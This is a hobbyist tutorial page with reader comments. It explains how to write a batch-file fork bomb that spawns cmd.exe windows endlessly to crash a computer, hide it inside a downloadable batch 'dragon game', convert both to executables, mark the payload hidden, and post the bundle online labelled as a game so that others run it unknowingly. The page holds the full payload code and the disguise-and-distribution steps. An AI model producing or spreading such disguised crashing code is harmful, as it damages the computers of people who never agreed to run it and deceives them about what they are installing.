Introduction: Hidden Virus & Game!
This is a batch game, with a virus at the end. The virus will only crash the computer, it should not do anything else.
::::::::::::::::::::::::::::::::::::::::::::::::::::::::::::::::::::::::::::::::::::::::::::::::::::::::::::::::::::::::::::::::::::::::::::::::::::::::::::::::::::::::::::::::::::::::::::::
I REPEAT, THIS DOES HAVE A VIRUS AT THE END, I AM NOT RESPONSIBLE FOR DAMAGE TO YOUR COMPUTER. DO NOT USE THIS FOR ILLEGAL PURPOSES!
::::::::::::::::::::::::::::::::::::::::::::::::::::::::::::::::::::::::::::::::::::::::::::::::::::::::::::::::::::::::::::::::::::::::::::::::::::::::::::::::::::::::::::::::::::::::::::::
Step 1: Copyrights
I used the dragon game by CodeSmartz, the link is here:
https://www.instructables.com/id/Batch-File-Dragon-...
The materials you need are:
* A computer
* Time
* a batch to exe converter:
http://www.battoexeconverter.com/#downloadbattoexe
* Knowledge of how to navigate a computer
Step 2: Virus Code
The code is between the #'s
#################################################################
@echo off
set #UA#=@@
cd "C:\"
mkdir "C:\Programs"
attrib "C:\Programs" +H
:1
if %#UA#% == @@ (
echo start cmd.exe
echo start cmd.exe
echo start cmd.exe
echo start cmd.exe
echo start cmd.exe
echo start cmd.exe
echo start cmd.exe
echo start cmd.exe
echo start cmd.exe
echo start cmd.exe
echo start cmd.exe
echo start cmd.exe
echo start cmd.exe
echo start cmd.exe
echo start cmd.exe
echo start cmd.exe
echo start cmd.exe
echo start cmd.exe
echo start cmd.exe
echo start cmd.exe
echo start cmd.exe
echo start cmd.exe
echo start cmd.exe
echo start cmd.exe
echo start cmd.exe
echo start cmd.exe
echo start cmd.exe
echo start cmd.exe
echo start cmd.exe
echo start cmd.exe
echo start cmd.exe
echo start cmd.exe
echo start cmd.exe
echo start cmd.exe
echo start cmd.exe
echo start cmd.exe
echo start cmd.exe
echo start cmd.exe
echo start cmd.exe
echo start cmd.exe
echo start cmd.exe
echo start cmd.exe
echo start cmd.exe
echo start cmd.exe
echo start cmd.exe
echo start cmd.exe
echo start cmd.exe
echo start cmd.exe
echo start cmd.exe
echo start cmd.exe
echo start cmd.exe
echo start cmd.exe
echo start cmd.exe
echo start cmd.exe
echo start cmd.exe
echo start cmd.exe
echo start cmd.exe
echo start cmd.exe
echo start cmd.exe
echo start cmd.exe
echo start cmd.exe
echo start cmd.exe
echo start cmd.exe
echo start cmd.exe
echo start cmd.exe
echo start cmd.exe
echo start cmd.exe
echo start cmd.exe
echo start cmd.exe
echo start cmd.exe
echo start cmd.exe
echo start cmd.exe)>>yeast.cmd
cls
start yeast.cmd
goto :1
###############################################
save this as STATS.cmd
At the very end of the Dragon game before the (goto :start) type:
START STATS.exe
then use the bat to exe converter to convert both files (the game and the virus) to an exe.
Then on stats: right click>properties>general tab>check Hidden>click OK
Then put both files into a zipped file then name it whatever you want, as long as it says it is a game, not a virus.
Step 3: Pranking! ;-D
Put it on the internet (like I did) and let every body download and get pranked!
Here is the copy I did:
4 Comments
1 year ago
Ether someone coppyed off of you or you coppied off of someone else because I have seen an instructable on "Batch Dragon Game" and it doesn't seem that there is any credit given in this instructable.
5 years ago
this is just a glorified loop i feel, like it could have been done like this in much less time:
:a
start
goto a
6 years ago
oh... crap, I just realized that STATS doesn't work, do not use the batch to exe program on it, then fiddle around with the code until it works how you want it to.
Thanks, Wilderness Tech
6 years ago
So cool! I love fun programs like this.